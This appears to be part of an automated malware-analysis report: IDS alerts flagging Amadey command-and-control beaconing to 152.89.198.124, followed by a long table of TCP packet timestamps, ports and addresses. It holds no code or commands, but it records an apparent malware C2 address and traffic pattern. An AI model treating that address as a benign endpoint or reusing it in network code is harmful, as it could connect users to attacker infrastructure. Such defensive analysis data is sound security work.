2024-10-27T17:11:29.299694+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	57862	152.89.198.124	80	TCP
2024-10-27T17:11:34.330315+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	57893	152.89.198.124	80	TCP
2024-10-27T17:11:39.303022+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	57920	152.89.198.124	80	TCP
2024-10-27T17:11:44.290710+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	57947	152.89.198.124	80	TCP
2024-10-27T17:11:49.677794+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	57979	152.89.198.124	80	TCP
2024-10-27T17:11:54.997339+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	57998	152.89.198.124	80	TCP
2024-10-27T17:11:59.950646+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	58000	152.89.198.124	80	TCP
2024-10-27T17:12:04.953738+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	58002	152.89.198.124	80	TCP
2024-10-27T17:12:09.870564+0100	2856148	ETPRO MALWARE Amadey CnC Activity M4	1	192.168.2.4	58004	152.89.198.124	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 17:10:07.240705967 CET	49675	443	192.168.2.4	173.222.162.32
Oct 27, 2024 17:10:23.476097107 CET	49723	80	192.168.2.4	2.19.126.163
Oct 27, 2024 17:10:23.482933044 CET	80	49723	2.19.126.163	192.168.2.4
Oct 27, 2024 17:10:23.483001947 CET	49723	80	192.168.2.4	2.19.126.163
Oct 27, 2024 17:10:37.791630983 CET	80	49724	217.20.57.22	192.168.2.4
Oct 27, 2024 17:10:37.791780949 CET	49724	80	192.168.2.4	217.20.57.22
Oct 27, 2024 17:10:37.795593977 CET	49724	80	192.168.2.4	217.20.57.22
Oct 27, 2024 17:10:37.803261042 CET	80	49724	217.20.57.22	192.168.2.4
Oct 27, 2024 17:10:46.490959883 CET	49731	80	192.168.2.4	104.18.38.233
Oct 27, 2024 17:10:46.491097927 CET	49732	80	192.168.2.4	172.64.149.23
Oct 27, 2024 17:10:46.491152048 CET	49730	80	192.168.2.4	104.18.38.233
Oct 27, 2024 17:10:46.497849941 CET	80	49731	104.18.38.233	192.168.2.4
Oct 27, 2024 17:10:46.497895002 CET	80	49732	172.64.149.23	192.168.2.4
Oct 27, 2024 17:10:46.497925997 CET	49731	80	192.168.2.4	104.18.38.233
Oct 27, 2024 17:10:46.497952938 CET	49732	80	192.168.2.4	172.64.149.23
Oct 27, 2024 17:10:46.498943090 CET	80	49730	104.18.38.233	192.168.2.4
Oct 27, 2024 17:10:46.498991966 CET	49730	80	192.168.2.4	104.18.38.233
Oct 27, 2024 17:10:48.796286106 CET	57709	53	192.168.2.4	162.159.36.2
Oct 27, 2024 17:10:48.801686049 CET	53	57709	162.159.36.2	192.168.2.4
Oct 27, 2024 17:10:48.801755905 CET	57709	53	192.168.2.4	162.159.36.2
Oct 27, 2024 17:10:48.801806927 CET	57709	53	192.168.2.4	162.159.36.2
Oct 27, 2024 17:10:48.807133913 CET	53	57709	162.159.36.2	192.168.2.4
Oct 27, 2024 17:10:49.412401915 CET	53	57709	162.159.36.2	192.168.2.4
Oct 27, 2024 17:10:49.413291931 CET	57709	53	192.168.2.4	162.159.36.2
Oct 27, 2024 17:10:49.419333935 CET	53	57709	162.159.36.2	192.168.2.4
Oct 27, 2024 17:10:49.419399023 CET	57709	53	192.168.2.4	162.159.36.2
Oct 27, 2024 17:10:59.917789936 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:10:59.917850018 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:10:59.917924881 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:10:59.918173075 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:10:59.918189049 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:00.654567957 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:00.654652119 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:00.656388998 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:00.656418085 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:00.656754017 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:00.666636944 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:00.707374096 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:00.746740103 CET	57713	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:00.752176046 CET	80	57713	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:00.752262115 CET	57713	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:00.752402067 CET	57713	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:00.757750034 CET	80	57713	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:00.908158064 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:00.908215046 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:00.908257961 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:00.908401012 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:00.908401012 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:00.908444881 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:00.908500910 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.030085087 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.030134916 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.030172110 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.030183077 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.030200958 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.030224085 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.145075083 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.145097017 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.145148993 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.145165920 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.145194054 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.145206928 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.260734081 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.260760069 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.260876894 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.260931969 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.260962963 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.260982990 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.376456976 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.376478910 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.376564980 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.376588106 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.376638889 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.376638889 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.492127895 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.492152929 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.492198944 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.492249012 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.492278099 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.492297888 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.608074903 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.608120918 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.608161926 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.608189106 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.608222008 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.608254910 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.637686014 CET	80	57713	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:01.640880108 CET	57713	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:01.651046038 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.651093960 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.651130915 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.651146889 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.651180029 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.651200056 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.766807079 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.766855001 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.766995907 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.766995907 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.767019033 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.769017935 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.881738901 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.881788969 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.881822109 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.881841898 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.882003069 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.882003069 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.955239058 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.955284119 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.955430031 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.955430031 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:01.955471992 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:01.956950903 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.040306091 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.040349960 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.040492058 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.040493011 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.040512085 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.041874886 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.113511086 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.113554955 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.113596916 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.113616943 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.113785982 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.113806963 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.156219959 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.156326056 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.156342030 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.156402111 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.156493902 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.156493902 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.156493902 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.156543016 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.198945045 CET	57715	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.198956013 CET	57714	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.199029922 CET	443	57714	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.199032068 CET	443	57715	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.199130058 CET	57714	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.199443102 CET	57714	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.199446917 CET	57715	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.199472904 CET	443	57714	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.199558973 CET	57715	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.199594975 CET	443	57715	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.200706005 CET	57716	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.200764894 CET	443	57716	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.200828075 CET	57716	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.200974941 CET	57716	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.200985909 CET	443	57716	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.201904058 CET	57717	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.201931000 CET	443	57717	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.201993942 CET	57717	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.202140093 CET	57717	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.202156067 CET	443	57717	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.202764034 CET	57718	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.202773094 CET	443	57718	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.202824116 CET	57718	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.202931881 CET	57718	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.202940941 CET	443	57718	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.459517002 CET	57712	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.459554911 CET	443	57712	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.934799910 CET	443	57714	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.935153961 CET	443	57717	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.935288906 CET	57714	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.935355902 CET	443	57714	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.935669899 CET	57714	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.935684919 CET	443	57714	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.935930967 CET	57717	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.935952902 CET	443	57717	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.936367035 CET	57717	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.936372042 CET	443	57717	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.952151060 CET	443	57718	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.952501059 CET	57718	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.952533960 CET	443	57718	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.952872038 CET	57718	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.952877998 CET	443	57718	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.960660934 CET	443	57715	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.960941076 CET	57715	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.961014986 CET	443	57715	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.961281061 CET	57715	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.961294889 CET	443	57715	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.961447001 CET	443	57716	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.961668968 CET	57716	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.961678028 CET	443	57716	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:02.961997032 CET	57716	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:02.962001085 CET	443	57716	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.067996979 CET	443	57714	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.068053961 CET	443	57714	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.068228006 CET	57714	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.068258047 CET	443	57714	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.068289995 CET	443	57714	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.068325996 CET	57714	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.068367958 CET	57714	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.068416119 CET	57714	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.068416119 CET	57714	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.068450928 CET	443	57714	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.068471909 CET	443	57714	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.068913937 CET	443	57717	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.069087982 CET	443	57717	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.069142103 CET	57717	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.069205046 CET	57717	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.069226027 CET	443	57717	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.069240093 CET	57717	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.069247007 CET	443	57717	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.070977926 CET	57719	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.071001053 CET	443	57719	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.071089029 CET	57719	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.071139097 CET	57720	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.071186066 CET	443	57720	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.071202040 CET	57719	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.071214914 CET	443	57719	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.071238041 CET	57720	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.071393013 CET	57720	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.071408987 CET	443	57720	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.088917971 CET	443	57718	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.088973045 CET	443	57718	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.089083910 CET	443	57718	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.089147091 CET	57718	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.089147091 CET	57718	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.089183092 CET	57718	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.089183092 CET	57718	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.089200020 CET	443	57718	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.089210033 CET	443	57718	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.091383934 CET	57721	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.091413021 CET	443	57721	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.091464043 CET	57721	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.091646910 CET	57721	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.091659069 CET	443	57721	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.099113941 CET	443	57716	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.099163055 CET	443	57716	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.099216938 CET	57716	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.099231005 CET	443	57716	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.099270105 CET	57716	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.099293947 CET	57716	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.099298000 CET	443	57716	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.099308014 CET	57716	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.099390984 CET	443	57716	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.099484921 CET	443	57716	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.101464987 CET	57722	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.101490021 CET	443	57722	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.101536036 CET	57722	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.101648092 CET	57722	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.101661921 CET	443	57722	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.163094997 CET	57713	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:03.163373947 CET	57723	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:03.166682959 CET	443	57715	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.166759014 CET	443	57715	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.166825056 CET	57715	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.166960955 CET	57715	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.166999102 CET	443	57715	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.167028904 CET	57715	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.167042971 CET	443	57715	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.169255972 CET	57724	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.169289112 CET	443	57724	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.169368029 CET	57724	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.169504881 CET	57724	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.169522047 CET	443	57724	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.170701027 CET	80	57723	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:03.170764923 CET	57723	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:03.170928955 CET	57723	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:03.171273947 CET	80	57713	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:03.171328068 CET	57713	80	192.168.2.4	152.89.198.124
Oct 27, 2024 17:11:03.178498983 CET	80	57723	152.89.198.124	192.168.2.4
Oct 27, 2024 17:11:03.815999985 CET	443	57719	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.816426992 CET	57719	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.816447020 CET	443	57719	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.816853046 CET	57719	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.816859961 CET	443	57719	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.839390039 CET	443	57720	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.839762926 CET	57720	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.839839935 CET	443	57720	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.840164900 CET	57720	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.840182066 CET	443	57720	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.849304914 CET	443	57722	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.849606991 CET	57722	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.849639893 CET	443	57722	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.849978924 CET	57722	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.849989891 CET	443	57722	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.878832102 CET	443	57721	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.879139900 CET	57721	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.879162073 CET	443	57721	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.879529953 CET	57721	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.879534006 CET	443	57721	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.901921988 CET	443	57724	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.902244091 CET	57724	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.902323008 CET	443	57724	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.902615070 CET	57724	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.902630091 CET	443	57724	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.949605942 CET	443	57719	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.949774981 CET	443	57719	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.949841976 CET	57719	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.952110052 CET	57719	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.952133894 CET	443	57719	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.952150106 CET	57719	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.952157021 CET	443	57719	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.954586029 CET	57725	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.954672098 CET	443	57725	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.954765081 CET	57725	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.954878092 CET	57725	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.954901934 CET	443	57725	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.974033117 CET	443	57720	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.974210978 CET	443	57720	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.974324942 CET	57720	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.979424953 CET	443	57722	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.980288029 CET	443	57722	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.980355978 CET	57722	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.987173080 CET	57720	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.987215042 CET	443	57720	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.987256050 CET	57720	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.987272978 CET	443	57720	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.987492085 CET	57722	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.987492085 CET	57722	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:03.987507105 CET	443	57722	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:03.987526894 CET	443	57722	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.023595095 CET	443	57721	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.024636984 CET	443	57721	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.024698019 CET	57721	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.033276081 CET	443	57724	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.034055948 CET	443	57724	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.034116983 CET	57724	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.050652027 CET	57724	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.050702095 CET	443	57724	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.050749063 CET	57724	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.050765038 CET	443	57724	13.107.246.51	192.168.2.4
Oct 27, 2024 17:11:04.052005053 CET	57721	443	192.168.2.4	13.107.246.51
Oct 27, 2024 17:11:04.052028894 CET	443	57721	13.107.246.51	192.168.2.4
